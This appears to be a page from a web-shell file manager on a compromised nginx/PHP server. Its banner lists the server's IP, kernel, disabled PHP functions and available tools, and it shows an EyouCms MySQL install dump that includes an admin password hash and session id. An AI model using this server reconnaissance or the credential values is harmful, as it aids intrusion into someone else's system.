| Server IP : 156.238.232.47 / Your IP : 216.73.216.150 Web Server : nginx/1.25.3 System : Linux C202504152095410 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : www ( 1000) PHP Version : 8.3.25 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /www/wwwroot/2026_02_11_01/install_52EAuGyHAGBKwTdLxPE4/ |
Upload File : |
-- ----------------------------------------
-- EyouCms MySQL Data Transfer
--
-- Server : 127.0.0.1_3306
-- Server Version : 5.7.26
-- Host : 127.0.0.1:3306
-- Database : e15
--
-- Part : #1
-- Version : #v1.6.3
-- Date : 2023-06-08 16:41:19
-- -----------------------------------------
SET FOREIGN_KEY_CHECKS = 0;
-- -----------------------------
-- Table structure for `ey_ad`
-- -----------------------------
DROP TABLE IF EXISTS `ey_ad`;
CREATE TABLE `ey_ad` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '广告id',
`pid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '广告位置ID',
`media_type` tinyint(1) DEFAULT '0' COMMENT '广告类型',
`title` varchar(60) DEFAULT '' COMMENT '广告名称',
`links` varchar(255) DEFAULT '' COMMENT '广告链接',
`litpic` varchar(255) DEFAULT '' COMMENT '图片地址',
`start_time` int(11) DEFAULT '0' COMMENT '投放时间',
`end_time` int(11) DEFAULT '0' COMMENT '结束时间',
`intro` text COMMENT '描述',
`link_man` varchar(60) DEFAULT '' COMMENT '添加人',
`link_email` varchar(60) DEFAULT '' COMMENT '添加人邮箱',
`link_phone` varchar(60) DEFAULT '' COMMENT '添加人联系电话',
`click` int(11) DEFAULT '0' COMMENT '点击量',
`bgcolor` varchar(30) DEFAULT '' COMMENT '背景颜色',
`status` tinyint(1) unsigned DEFAULT '1' COMMENT '1=显示,0=屏蔽',
`sort_order` int(11) DEFAULT '0' COMMENT '排序',
`target` varchar(50) DEFAULT '' COMMENT '是否开启浏览器新窗口',
`admin_id` int(10) DEFAULT '0' COMMENT '管理员ID',
`is_del` tinyint(1) DEFAULT '0' COMMENT '伪删除,1=是,0=否',
`lang` varchar(50) DEFAULT 'cn' COMMENT '多语言',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `position_id` (`pid`) USING BTREE,
KEY `status` (`status`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_ad`
-- -----------------------------
INSERT INTO `ey_ad` VALUES ('1', '1', '1', '幻灯一', '', '/public/upload/other/2018/08/29/4fcc3dc76d19f6743aa57c49ae0c757f.jpg', '0', '0', '', '', '', '', '0', '', '1', '100', '1', '0', '0', 'cn', '1533543051', '1535503396');
INSERT INTO `ey_ad` VALUES ('2', '1', '1', '幻灯二', '', '/public/upload/other/2018/08/29/4c37b5b6c6f77bca41688c5290ca9b49.jpg', '0', '0', '', '', '', '', '0', '', '1', '100', '1', '0', '0', 'cn', '1533543086', '1535503380');
-- -----------------------------
-- Table structure for `ey_ad_position`
-- -----------------------------
DROP TABLE IF EXISTS `ey_ad_position`;
CREATE TABLE `ey_ad_position` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`title` varchar(60) NOT NULL DEFAULT '' COMMENT '广告位置名称',
`type` tinyint(1) NOT NULL DEFAULT '1' COMMENT '广告展示类型,1图片类型,2媒体类型,3HTML代码',
`width` smallint(5) unsigned NOT NULL DEFAULT '0' COMMENT '广告位宽度',
`height` smallint(5) unsigned NOT NULL DEFAULT '0' COMMENT '广告位高度',
`intro` text NOT NULL COMMENT '广告描述',
`status` tinyint(1) NOT NULL DEFAULT '1' COMMENT '0关闭1开启',
`lang` varchar(50) NOT NULL DEFAULT 'cn' COMMENT '多语言',
`admin_id` int(10) NOT NULL DEFAULT '0' COMMENT '管理员ID',
`is_del` tinyint(1) NOT NULL DEFAULT '0' COMMENT '伪删除,1=是,0=否',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='广告位置表';
-- -----------------------------
-- Records of `ey_ad_position`
-- -----------------------------
INSERT INTO `ey_ad_position` VALUES ('1', '首页幻灯', '1', '1600', '550', '', '1', 'cn', '0', '0', '1533542954', '1535529096');
-- -----------------------------
-- Table structure for `ey_addon17_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_addon17_content`;
CREATE TABLE `ey_addon17_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`video` varchar(251) NOT NULL DEFAULT '' COMMENT '视频上传',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_addon17_content`
-- -----------------------------
INSERT INTO `ey_addon17_content` VALUES ('1', '82', '1637110204', '1637110204', '/uploads/media/200706/1-200F61RZ5.mp4');
INSERT INTO `ey_addon17_content` VALUES ('2', '83', '1637110204', '1637110204', '/uploads/media/200706/1-200F61RZ5.mp4');
INSERT INTO `ey_addon17_content` VALUES ('3', '84', '1637110204', '1637110204', '/uploads/media/200706/1-200F61RZ5.mp4');
INSERT INTO `ey_addon17_content` VALUES ('4', '85', '1637110204', '1637110204', '/uploads/media/200706/1-200F61RZ5.mp4');
INSERT INTO `ey_addon17_content` VALUES ('5', '86', '1637110204', '1637110204', '/uploads/media/200706/1-200F61RZ5.mp4');
INSERT INTO `ey_addon17_content` VALUES ('6', '87', '1637110204', '1637110204', '/uploads/media/200706/1-200F61RZ5.mp4');
-- -----------------------------
-- Table structure for `ey_admin`
-- -----------------------------
DROP TABLE IF EXISTS `ey_admin`;
CREATE TABLE `ey_admin` (
`admin_id` smallint(5) unsigned NOT NULL AUTO_INCREMENT COMMENT '用户id',
`user_name` varchar(20) NOT NULL DEFAULT '' COMMENT '用户名',
`pen_name` varchar(50) DEFAULT '' COMMENT '笔名(发布文章后显示责任编辑的名字)',
`true_name` varchar(20) DEFAULT '' COMMENT '真实姓名',
`mobile` varchar(11) DEFAULT '' COMMENT '手机号码',
`email` varchar(60) DEFAULT '' COMMENT 'email',
`password` varchar(255) NOT NULL DEFAULT '' COMMENT '密码',
`head_pic` varchar(255) DEFAULT '' COMMENT '头像',
`last_login` int(11) DEFAULT '0' COMMENT '最后登录时间',
`last_ip` varchar(15) DEFAULT '' COMMENT '最后登录ip',
`login_cnt` int(11) DEFAULT '0' COMMENT '登录次数',
`session_id` varchar(50) DEFAULT '' COMMENT 'session_id',
`parent_id` int(10) DEFAULT '0' COMMENT '父管理员ID',
`role_id` int(10) NOT NULL DEFAULT '-1' COMMENT '角色组ID(-1表示超级管理员)',
`mark_lang` varchar(50) DEFAULT 'cn' COMMENT '当前语言标识',
`status` tinyint(1) DEFAULT '1' COMMENT '状态(0=屏蔽,1=正常)',
`syn_users_id` int(10) DEFAULT '0' COMMENT '同步注册到会员表',
`desc` varchar(500) DEFAULT '' COMMENT '工作内容',
`wechat_followed` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '记录是否关注了微信公众号,默认0;0=未关注、1=已关注',
`wechat_open_id` varchar(50) NOT NULL DEFAULT '' COMMENT 'open_id,关注微信公众号后存入',
`add_time` int(11) DEFAULT '0' COMMENT '添加时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`admin_id`),
KEY `user_name` (`user_name`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_admin`
-- -----------------------------
INSERT INTO `ey_admin` VALUES ('1', 'admin', '', 'admin', '', '', '$2y$11$574ffd130eecb61a99ff8urzzbE7LbcjJXITYushACv524pWSIP6C', '', '1686213561', '127.0.0.1', '2', 'm49uhv668f9vgsmv6d6ni3ss2l', '0', '-1', 'cn', '1', '0', '', '0', '', '1686213555', '0');
-- -----------------------------
-- Table structure for `ey_admin_log`
-- -----------------------------
DROP TABLE IF EXISTS `ey_admin_log`;
CREATE TABLE `ey_admin_log` (
`log_id` bigint(16) unsigned NOT NULL AUTO_INCREMENT COMMENT '表id',
`admin_id` int(10) NOT NULL DEFAULT '-1' COMMENT '管理员id',
`log_info` text COMMENT '日志描述',
`log_ip` varchar(30) DEFAULT '' COMMENT 'ip地址',
`log_url` varchar(255) DEFAULT '' COMMENT 'url',
`log_time` int(11) DEFAULT '0' COMMENT '日志时间',
PRIMARY KEY (`log_id`),
KEY `admin_id` (`admin_id`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=320 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_admin_log`
-- -----------------------------
INSERT INTO `ey_admin_log` VALUES ('317', '1', '保存自定义变量:网站公告,手机号码,地址,电话,邮箱,微信二维码,QQ客服', '127.0.0.1', '/login.php', '1686213619');
INSERT INTO `ey_admin_log` VALUES ('316', '1', '后台登录', '127.0.0.1', '/login.php', '1686213561');
INSERT INTO `ey_admin_log` VALUES ('315', '-1', '访问后台', '127.0.0.1', '/login.php', '1686213557');
INSERT INTO `ey_admin_log` VALUES ('318', '1', '编辑友情链接:淘宝', '127.0.0.1', '/login.php', '1686213627');
INSERT INTO `ey_admin_log` VALUES ('319', '1', '编辑栏目:联系我们', '127.0.0.1', '/login.php', '1686213669');
-- -----------------------------
-- Table structure for `ey_admin_menu`
-- -----------------------------
DROP TABLE IF EXISTS `ey_admin_menu`;
CREATE TABLE `ey_admin_menu` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`menu_id` int(11) DEFAULT '0',
`title` varchar(100) DEFAULT '' COMMENT '导航名称',
`controller_name` varchar(50) DEFAULT '' COMMENT '控制器',
`action_name` varchar(50) DEFAULT '' COMMENT '方法名',
`param` varchar(255) DEFAULT '' COMMENT '参数',
`icon` varchar(50) DEFAULT 'iconfont e-lanmuguanli' COMMENT '图标',
`is_menu` tinyint(1) DEFAULT '0' COMMENT '是否显示为左侧菜单',
`is_switch` tinyint(1) DEFAULT '0' COMMENT '是否显示在switch_map页面中',
`sort_order` int(10) DEFAULT '100' COMMENT '排序号',
`status` tinyint(1) DEFAULT '1' COMMENT '状态,1=显示,0=隐藏',
`lang` varchar(20) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
UNIQUE KEY `menu_id` (`menu_id`)
) ENGINE=MyISAM AUTO_INCREMENT=15 DEFAULT CHARSET=utf8 COMMENT='外挂功能地图菜单表';
-- -----------------------------
-- Records of `ey_admin_menu`
-- -----------------------------
INSERT INTO `ey_admin_menu` VALUES ('1', '1005', '欢迎页', 'Index', 'welcome', '', 'fa fa-user', '0', '1', '100', '1', 'cn', '1668569108', '1668569108');
INSERT INTO `ey_admin_menu` VALUES ('2', '1001', '栏目管理', 'Arctype', 'index', '|mt20|1', 'iconfont e-lanmuguanli', '1', '1', '100', '1', 'cn', '1668569108', '1668569108');
INSERT INTO `ey_admin_menu` VALUES ('3', '1002', '内容管理', 'Archives', 'index', '', 'iconfont e-neirongwendang', '1', '1', '100', '1', 'cn', '1668569108', '1668569108');
INSERT INTO `ey_admin_menu` VALUES ('4', '1004', '待审文档', 'Archives', 'index_draft', '|menu|1', 'iconfont e-tougao', '0', '1', '100', '1', 'cn', '1668569108', '1668569108');
INSERT INTO `ey_admin_menu` VALUES ('5', '1003', '广告管理', 'AdPosition', 'index', '', 'iconfont e-guanggao', '1', '1', '100', '1', 'cn', '1668569108', '1668569108');
INSERT INTO `ey_admin_menu` VALUES ('6', '2001', '基本信息', 'System', 'web', '', 'iconfont e-shezhi', '1', '1', '100', '1', 'cn', '1668569108', '1668569108');
INSERT INTO `ey_admin_menu` VALUES ('7', '2002', '可视编辑', 'Uiset', 'ui_index', '', 'iconfont e-keshihuabianji', '0', '1', '100', '1', 'cn', '1668569108', '1668569108');
INSERT INTO `ey_admin_menu` VALUES ('8', '2003', 'SEO模块', 'Seo', 'seo', '', 'iconfont e-seo', '1', '1', '100', '1', 'cn', '1668569108', '1668569108');
INSERT INTO `ey_admin_menu` VALUES ('9', '2004', '功能地图', 'Index', 'switch_map', '', 'iconfont e-caidangongneng', '1', '0', '10000', '1', 'cn', '1668569108', '1668569108');
INSERT INTO `ey_admin_menu` VALUES ('10', '2005', '插件应用', 'Weapp', 'index', '', 'iconfont e-chajian', '0', '1', '100', '1', 'cn', '1668569108', '1668569108');
INSERT INTO `ey_admin_menu` VALUES ('11', '2006', '会员中心', 'Member', 'users_index', '', 'iconfont e-gerenzhongxin', '0', '1', '100', '1', 'cn', '1668569108', '1668569108');
INSERT INTO `ey_admin_menu` VALUES ('12', '2008', '商城中心', 'Shop', 'home', '', 'iconfont e-shangcheng', '1', '1', '100', '1', 'cn', '1668569108', '1668569109');
INSERT INTO `ey_admin_menu` VALUES ('13', '2009', '可视化小程序', 'Diyminipro', 'page_edit', '', 'fa fa-code', '0', '1', '100', '1', 'cn', '1668569108', '1668569108');
INSERT INTO `ey_admin_menu` VALUES ('14', '2004018', '留言中心', 'Form', 'index', '', 'iconfont e-biaodanguanli', '0', '1', '100', '1', 'cn', '1677037793', '1677146423');
-- -----------------------------
-- Table structure for `ey_admin_wxlogin`
-- -----------------------------
DROP TABLE IF EXISTS `ey_admin_wxlogin`;
CREATE TABLE `ey_admin_wxlogin` (
`wx_id` int(11) NOT NULL AUTO_INCREMENT,
`type` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '1=官方公众号,2=微信应用',
`admin_id` int(11) NOT NULL DEFAULT '0' COMMENT '用户id',
`openid` varchar(50) NOT NULL DEFAULT '' COMMENT 'openid',
`nickname` varchar(100) NOT NULL DEFAULT '' COMMENT '微信昵称',
`unionid` varchar(200) NOT NULL DEFAULT '' COMMENT 'unionid',
`headimgurl` varchar(200) NOT NULL DEFAULT '' COMMENT '头像',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`wx_id`) USING BTREE,
KEY `openid` (`openid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='后台微信登录记录表';
-- -----------------------------
-- Table structure for `ey_anli_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_anli_content`;
CREATE TABLE `ey_anli_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`xinghao` varchar(200) NOT NULL DEFAULT '' COMMENT '产品型号',
`body` longtext COMMENT '内容',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_anli_content`
-- -----------------------------
INSERT INTO `ey_anli_content` VALUES ('1', '3', '1550193208', '1550193208', 'YS-BLM6256', '<p style="text-align: center;"><img src="/uploads/ueditor/20190215/713cd23751c0e7fe62bbf1e5191f2152.png" title="713cd23751c0e7fe62bbf1e5191f2152.png" alt="713cd23751c0e7fe62bbf1e5191f2152.png"/></p><p style="text-align: center;">这里是案例展示的内容。</p>');
INSERT INTO `ey_anli_content` VALUES ('2', '4', '1550193197', '1550193197', 'YS-BLM5769', '<p style="text-align: center;"><span style="text-align: center;"><img src="/uploads/ueditor/20190215/dee87fce7eb58059bed81a1f7cce81b0.png" title="dee87fce7eb58059bed81a1f7cce81b0.png" alt="dee87fce7eb58059bed81a1f7cce81b0.png"/></span></p><p style="text-align: center;"><span style="text-align: center;">这里是案例展示的内容。</span></p>');
INSERT INTO `ey_anli_content` VALUES ('3', '5', '1550193179', '1550193179', 'YS-BLM5616', '<p style="text-align: center;"><img src="/uploads/ueditor/20190215/d345a633a2d6f69507e6881fdf20d568.png" title="d345a633a2d6f69507e6881fdf20d568.png" alt="d345a633a2d6f69507e6881fdf20d568.png"/></p><p style="text-align: center;">这里是案例展示的内容。</p>');
INSERT INTO `ey_anli_content` VALUES ('4', '6', '1550193145', '1550193145', 'YS-BLM8649', '<p style="text-align: center;"><img src="/uploads/ueditor/20190215/18f42e633e075f417df9b68df41a072f.png" title="18f42e633e075f417df9b68df41a072f.png" alt="18f42e633e075f417df9b68df41a072f.png"/></p><p style="text-align: center;">这里是案例展示的内容。<br/></p>');
-- -----------------------------
-- Table structure for `ey_appletstyle_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_appletstyle_content`;
CREATE TABLE `ey_appletstyle_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`color` enum('red','blue','golden','black') DEFAULT 'red' COMMENT '背景色',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_appletstyle_content`
-- -----------------------------
INSERT INTO `ey_appletstyle_content` VALUES ('1', '110', '1666943946', '1666943946', 'black');
-- -----------------------------
-- Table structure for `ey_archives`
-- -----------------------------
DROP TABLE IF EXISTS `ey_archives`;
CREATE TABLE `ey_archives` (
`aid` int(10) NOT NULL AUTO_INCREMENT,
`typeid` int(10) NOT NULL DEFAULT '0' COMMENT '当前栏目',
`stypeid` varchar(90) DEFAULT '' COMMENT '副栏目ID集合',
`channel` int(10) NOT NULL DEFAULT '0' COMMENT '模型ID',
`is_b` tinyint(1) DEFAULT '0' COMMENT '加粗',
`title` varchar(200) DEFAULT '' COMMENT '标题',
`subtitle` varchar(200) DEFAULT '' COMMENT '副标题',
`litpic` varchar(250) DEFAULT '' COMMENT '缩略图',
`is_head` tinyint(1) DEFAULT '0' COMMENT '头条(0=否,1=是)',
`is_special` tinyint(1) DEFAULT '0' COMMENT '特荐(0=否,1=是)',
`is_top` tinyint(1) DEFAULT '0' COMMENT '置顶(0=否,1=是)',
`is_recom` tinyint(1) DEFAULT '0' COMMENT '推荐(0=否,1=是)',
`is_jump` tinyint(1) DEFAULT '0' COMMENT '跳转链接(0=否,1=是)',
`is_litpic` tinyint(1) DEFAULT '0' COMMENT '图片(0=否,1=是)',
`is_roll` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '滚动(0=否,1=是)',
`is_slide` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '幻灯(0=否,1=是)',
`is_diyattr` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '自定义(0=否,1=是)',
`origin` varchar(200) DEFAULT '' COMMENT '来源',
`author` varchar(200) DEFAULT '' COMMENT '作者',
`click` int(10) DEFAULT '0' COMMENT '浏览量',
`arcrank` int(10) DEFAULT '0' COMMENT '阅读权限:0=开放浏览,-1=待审核稿件',
`jumplinks` varchar(255) DEFAULT '' COMMENT '外链跳转',
`ismake` tinyint(1) DEFAULT '0' COMMENT '是否静态页面(0=动态,1=静态)',
`seo_title` varchar(200) DEFAULT '' COMMENT 'SEO标题',
`seo_keywords` varchar(200) DEFAULT '' COMMENT 'SEO关键词',
`seo_description` text COMMENT 'SEO描述',
`attrlist_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '参数列表ID',
`merchant_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '多商家ID',
`free_shipping` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '商品是否包邮(1包邮(免运费) 0跟随系统)',
`users_price` decimal(10,2) NOT NULL DEFAULT '0.00' COMMENT '会员价',
`users_free` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否会员免费,默认0不免费,1为免费',
`old_price` decimal(10,2) NOT NULL DEFAULT '0.00' COMMENT '产品旧价',
`sales_num` int(10) NOT NULL DEFAULT '0' COMMENT '总销售量',
`virtual_sales` int(10) DEFAULT '0' COMMENT '商品虚拟销售量',
`sales_all` int(10) DEFAULT '0' COMMENT '虚拟总销量',
`stock_count` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '商品库存量',
`stock_show` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '商品库存在产品详情页是否显示,1为显示,0为不显示',
`prom_type` tinyint(1) unsigned DEFAULT '0' COMMENT '产品类型:0=普通产品,1=虚拟(默认手动发货),2=虚拟(网盘),3=虚拟(自定义文本) 4-核销',
`tempview` varchar(200) DEFAULT '' COMMENT '文档模板文件名',
`status` tinyint(1) DEFAULT '1' COMMENT '状态(0=屏蔽,1=正常)',
`sort_order` int(10) DEFAULT '0' COMMENT '排序号',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`admin_id` int(10) DEFAULT '0' COMMENT '管理员ID',
`users_id` int(10) DEFAULT '0' COMMENT '会员ID',
`arc_level_id` int(10) DEFAULT '0' COMMENT '文档会员权限ID',
`restric_type` tinyint(1) DEFAULT '0' COMMENT '限制模式,0=免费,1=付费,2=会员专享,3=会员付费',
`is_del` tinyint(1) DEFAULT '0' COMMENT '伪删除,1=是,0=否',
`del_method` tinyint(1) DEFAULT '0' COMMENT '伪删除状态,1为主动删除,2为跟随上级栏目被动删除',
`joinaid` int(10) DEFAULT '0' COMMENT '关联文档ID',
`downcount` int(10) DEFAULT '0' COMMENT '下载次数',
`appraise` int(10) DEFAULT '0' COMMENT '评价数',
`collection` int(10) DEFAULT '0' COMMENT '收藏数',
`htmlfilename` varchar(500) DEFAULT '' COMMENT '自定义文件名',
`province_id` int(10) DEFAULT '0' COMMENT '省份',
`city_id` int(10) DEFAULT '0' COMMENT '所在城市',
`area_id` int(10) DEFAULT '0' COMMENT '所在区域',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`no_vip_pay` tinyint(3) DEFAULT '0' COMMENT 'restric_type = 2 时,会员专享,非会员可付费使用,0-关闭,1-开启',
PRIMARY KEY (`aid`),
KEY `aid` (`typeid`,`channel`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=57 DEFAULT CHARSET=utf8 COMMENT='资讯表';
-- -----------------------------
-- Records of `ey_archives`
-- -----------------------------
INSERT INTO `ey_archives` VALUES ('1', '1', '', '6', '0', '关于我们', '', '', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '0', '0', '', '0', '', '', '', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1533541630', '1534403477', '0');
INSERT INTO `ey_archives` VALUES ('2', '8', '', '6', '0', '联系我们', '', '', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '0', '0', '', '0', '', '', '', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1533542101', '1534219608', '0');
INSERT INTO `ey_archives` VALUES ('11', '3', '', '1', '0', '公众聚集场所消防安全检查', '', '/public/upload/article/2018/08/15/6f700335422d8666e5bd486fdb8839e1.jpg', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '256', '0', '', '0', '', '', '公众聚集场所的消防安全,历来是消防监督管理的重点。新消防法继承和发展了原消防法关于公安机关消防机构对公众聚集的场所在使用、营业前实施消防安全检查的规定,取消了原消防法中关于对公众聚集场所未经消防安全检查或者经检查不符合消防安全要求擅自投入使用、营业的行政处罚中,限期改正的前置条件,对存在上述违法行为的,规定了直接给予责令停止施工、停止使用、停产停业和罚款的行政处罚。 举办大型群众性活动消防安全有要求 为减少行政许可事项,新消防法将大型群众性活动的消防安全纳入《大型群众性活动安全管理条例》规定的治安行政许可审查内容,避免了多头审批,方便社会,方便群众,同时明确了消防安全要求,规定举办大型群众性活动,承办人应当依法向公安机关申请安全许可,制定灭火和应急疏散预案并组织演练,明确消防安全责任分工,确定消防安全管理人员,保持消防设施和消防器材配置齐全、完好有效,保证疏散通道、安全出口、疏散指示标志、应急照明和消防车通道符合消防技术标准', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1533546369', '1534497406', '0');
INSERT INTO `ey_archives` VALUES ('12', '3', '', '1', '0', '以网络游戏为代表的网络文艺治理', '', '/public/upload/article/2018/08/17/6ae0370cfd6d509110db63a11ea977c9.jpg', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '136', '0', '', '0', '', '', ' 开发功能性游戏,对在全球网络游戏市场份额占比近10%的腾讯来说,显然是一个重要节点,对全行业也有积极影响。但是,对我国这一全球最大的网络游戏市场而言,对不断加大走出去力度的众多中国互联网企业而言,这仅仅是漫长征程的第一步。开发出更多可以服务具体应用目的和应用场景的,具有正面主流价值的功能游戏,应当成为全行业的共识。因为,这绝不仅仅关乎企业自身的商业利益,对于改变当前社会上对网络游戏的一些片面认识,促进网络游戏全行业的转型升级,更是有着重要意义。', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1533546479', '1535532129', '0');
INSERT INTO `ey_archives` VALUES ('13', '3', '', '1', '0', '未来几年,功能游戏将有两位数的年均复合增长率', '', '/public/upload/article/2018/08/17/e3953697b81d7a9dc6b4ecad50a6e3c2.jpg', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '266', '0', '', '0', '', '', '市场规模将迅速增长到300亿元到500亿元,其广阔的发展前景和深远影响更将远远超过其商业价值。在可预见的将来,功能游戏还将进一步主流化,成为主流社会日常性的互联网应用工具。过去几年,我国出现了《韩熙载夜宴图》《每日故宫》《紫禁城祥瑞》《皇帝的一天》以及《榫卯》《折扇》等和传统文化深入融合的功能游戏精品佳作,但就我国网络游戏行业的实际发展情况而言,在功能游戏领域,我们只是刚刚起步。', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1533547487', '1534497391', '0');
INSERT INTO `ey_archives` VALUES ('14', '3', '', '1', '0', '近日,腾讯公司正式对外宣布', '', '/public/upload/article/2018/08/17/670ffe248573ab60575b12308d6ad692.jpg', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '127', '0', '', '0', '', '', '自世纪之交以来,网络游戏及其所依托的网络文艺,作为移动互联网时代新兴媒介的文化娱乐形态,在全世界方兴未艾。2017年,我国网络游戏用户整体规模已有5亿左右,在全部网民中的占比接近7成。我国网络游戏行业整体营收达2189.6亿元,相当于全球电影票房的总和。', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1533547565', '1534497384', '0');
INSERT INTO `ey_archives` VALUES ('29', '21', '', '1', '0', '游戏展示一', '', '/public/upload/article/2018/08/18/b12c929590bdc85e9bc612b674445d73.jpg', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '126', '0', '', '0', '', '', ' 需要指出的是,一般网民的网络游戏概念基本上停留在消遣娱乐的刻板化印象上。但实际上,网络游戏的内在构成已经有了相当程度的发展,有着丰富的内涵。例如,功能游戏是网络游戏一个极为重要的组成部分,是以解决社会和行业问题为主要目的的游戏类型,但其在主流视野中却鲜为人知。 1994年,基于海湾战争的经验,美国海军陆战队成立了世界上第一个功能游戏军事训练机构,将功能游戏作为军队模拟训练的辅助手段。经过互联网领域在世纪之交的爆炸式发展,2006年之后,功能游戏逐渐拓展到了民用领域,在教育、医疗、交通、应急管理、环境保护、企业管理、文化传承等方面发挥了重要作用,为很多国家的政府部门、社会机构解决社会公共生活的各类难题,提供了不可替代的治理演练和经验。', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1534155569', '1535531282', '0');
